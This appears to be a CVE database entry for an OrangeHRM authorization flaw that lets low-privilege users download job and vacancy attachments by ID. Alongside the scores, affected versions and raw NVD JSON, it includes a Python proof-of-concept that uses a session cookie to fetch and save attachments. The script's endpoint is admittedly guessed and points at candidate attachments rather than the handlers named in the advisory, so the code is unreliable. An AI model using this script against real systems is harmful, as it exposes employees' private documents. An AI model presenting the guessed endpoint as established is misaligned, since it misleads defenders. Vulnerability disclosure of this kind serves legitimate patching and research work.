CVE-2026-39348

Description

OrangeHRM is a comprehensive human resource management (HRM) system. From 5.0 to 5.8, OrangeHRM Open Source omits authorization on job specification and vacancy attachment download handlers, allowing authenticated low-privilege users to read attachments via direct reference to attachment identifiers. This vulnerability is fixed in 5.8.1.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:orangehrm:orangehrm:*:*:*:*:*:*:*:* - VULNERABLE

OrangeHRM Open Source 5.0

OrangeHRM Open Source 5.1

OrangeHRM Open Source 5.2

OrangeHRM Open Source 5.3

OrangeHRM Open Source 5.4

OrangeHRM Open Source 5.5

OrangeHRM Open Source 5.6

OrangeHRM Open Source 5.7

OrangeHRM Open Source 5.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-39348: IDOR in OrangeHRM Attachment Download
# Description: Exploits missing authorization check to download attachments by ID.

import requests

def exploit_orangehrm_idor(target_url, session_cookie, attachment_id):
    """
    Attempts to download an attachment using a low-privilege session.
    """
    # The vulnerable endpoint might be similar to this structure based on the advisory
    # Note: The exact endpoint path needs to be verified against the specific version
    url = f"{target_url}/index.php/recruitment/viewCandidateAttachment/{attachment_id}"
    
    headers = {
        "Cookie": session_cookie,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }
    
    try:
        response = requests.get(url, headers=headers)
        if response.status_code == 200:
            print(f"[+] Successfully downloaded attachment ID: {attachment_id}")
            print(f"[+] Content-Type: {response.headers.get('Content-Type')}")
            # Save the file
            with open(f"attachment_{attachment_id}", "wb") as f:
                f.write(response.content)
            return True
        else:
            print(f"[-] Failed to download. Status code: {response.status_code}")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

# Example usage
# target = "http://localhost/orangehrm"
# cookie = "PHPSESSID=attacker_session_id_here"
# exploit_orangehrm_idor(target, cookie, 1)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39348
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39348
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39348/
[4] VulDB https://vuldb.com/cve/CVE-2026-39348
[5] https://github.com/orangehrm/orangehrm/security/advisories/GHSA-mm39-mv56-754r

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39348", "sourceIdentifier": "[email protected]", "published": "2026-04-07T19:16:45.923", "lastModified": "2026-04-10T19:33:25.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OrangeHRM is a comprehensive human resource management (HRM) system. From 5.0 to 5.8, OrangeHRM Open Source omits authorization on job specification and vacancy attachment download handlers, allowing authenticated low-privilege users to read attachments via direct reference to attachment identifiers. This vulnerability is fixed in 5.8.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:orangehrm:orangehrm:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0", "versionEndExcluding": "5.8.1", "matchCriteriaId": "804C1EE9-4D17-4056-B3D6-1BDB9F0BB026"}]}]}], "references": [{"url": "https://github.com/orangehrm/orangehrm/security/advisories/GHSA-mm39-mv56-754r", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}